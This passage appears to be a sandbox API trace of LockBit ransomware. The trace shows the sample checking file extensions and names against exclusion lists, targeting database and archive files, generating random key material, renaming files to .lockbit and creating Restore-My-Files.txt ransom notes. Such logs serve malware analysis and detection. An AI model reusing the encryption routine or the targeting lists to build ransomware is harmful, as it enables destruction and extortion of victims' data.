-1 [0197.832] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.833] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.833] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0293240.WMF") returned 1 [0197.833] lstrcmpiW (lpString1="ntldr", lpString2="J0293240.WMF") returned 1 [0197.833] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0293240.WMF") returned 1 [0197.833] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0293240.WMF") returned -1 [0197.833] lstrcmpiW (lpString1="autorun.inf", lpString2="J0293240.WMF") returned -1 [0197.834] lstrcmpiW (lpString1="thumbs.db", lpString2="J0293240.WMF") returned 1 [0197.834] lstrcmpiW (lpString1="iconcache.db", lpString2="J0293240.WMF") returned -1 [0197.834] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.834] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293240.WMF") returned=".WMF" [0197.834] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.834] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.834] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.835] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.835] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.835] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.835] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.835] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.835] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293240.WMF.lockbit") returned 70 [0197.835] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293240.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293240.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.836] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.836] malloc (_Size=0x40068) returned 0x3df0008 [0197.836] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2190) returned 1 [0197.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.838] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.838] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.842] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293240.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293240.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.842] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.842] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.843] free (_Block=0x1fa2ed8) [0197.843] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293240.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.843] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.843] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.843] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47a99d00, ftCreationTime.dwHighDateTime=0x1bf1523, ftLastAccessTime.dwLowDateTime=0xbd61d940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x47a99d00, ftLastWriteTime.dwHighDateTime=0x1bf1523, nFileSizeHigh=0x0, nFileSizeLow=0x92c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0293570.WMF", cAlternateFileName="")) returned 1 [0197.843] lstrcmpiW (lpString1=".", lpString2="J0293570.WMF") returned -1 [0197.843] lstrcmpiW (lpString1="..", lpString2="J0293570.WMF") returned -1 [0197.843] PathFindExtensionW (pszPath="J0293570.WMF") returned=".WMF" [0197.843] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.843] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.844] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.844] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0293570.WMF") returned 1 [0197.845] lstrcmpiW (lpString1="ntldr", lpString2="J0293570.WMF") returned 1 [0197.845] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0293570.WMF") returned 1 [0197.845] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0293570.WMF") returned -1 [0197.845] lstrcmpiW (lpString1="autorun.inf", lpString2="J0293570.WMF") returned -1 [0197.845] lstrcmpiW (lpString1="thumbs.db", lpString2="J0293570.WMF") returned 1 [0197.845] lstrcmpiW (lpString1="iconcache.db", lpString2="J0293570.WMF") returned -1 [0197.845] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.845] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293570.WMF") returned=".WMF" [0197.845] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.845] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.845] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.846] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.846] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293570.WMF.lockbit") returned 70 [0197.846] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293570.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293570.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.848] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.848] malloc (_Size=0x40068) returned 0x3df0008 [0197.848] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2348) returned 1 [0197.848] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.848] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.848] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.849] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.849] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.854] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293570.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293570.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.854] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.854] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.855] free (_Block=0x1fa2ed8) [0197.855] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293570.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.855] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.855] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.855] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0911500, ftCreationTime.dwHighDateTime=0x1bf1523, ftLastAccessTime.dwLowDateTime=0xbd643aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb0911500, ftLastWriteTime.dwHighDateTime=0x1bf1523, nFileSizeHigh=0x0, nFileSizeLow=0x15ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0293828.WMF", cAlternateFileName="")) returned 1 [0197.855] lstrcmpiW (lpString1=".", lpString2="J0293828.WMF") returned -1 [0197.855] lstrcmpiW (lpString1="..", lpString2="J0293828.WMF") returned -1 [0197.855] PathFindExtensionW (pszPath="J0293828.WMF") returned=".WMF" [0197.855] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.855] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.856] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.856] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0293828.WMF") returned 1 [0197.857] lstrcmpiW (lpString1="ntldr", lpString2="J0293828.WMF") returned 1 [0197.857] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0293828.WMF") returned 1 [0197.857] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0293828.WMF") returned -1 [0197.857] lstrcmpiW (lpString1="autorun.inf", lpString2="J0293828.WMF") returned -1 [0197.857] lstrcmpiW (lpString1="thumbs.db", lpString2="J0293828.WMF") returned 1 [0197.857] lstrcmpiW (lpString1="iconcache.db", lpString2="J0293828.WMF") returned -1 [0197.857] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.857] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293828.WMF") returned=".WMF" [0197.857] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.857] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.857] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.858] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.858] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.858] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.858] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.858] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.858] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.858] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.858] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.858] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.858] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.858] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293828.WMF.lockbit") returned 70 [0197.858] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293828.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293828.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.863] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.863] malloc (_Size=0x40068) returned 0x3df0008 [0197.863] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5610) returned 1 [0197.863] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.863] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.864] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.864] 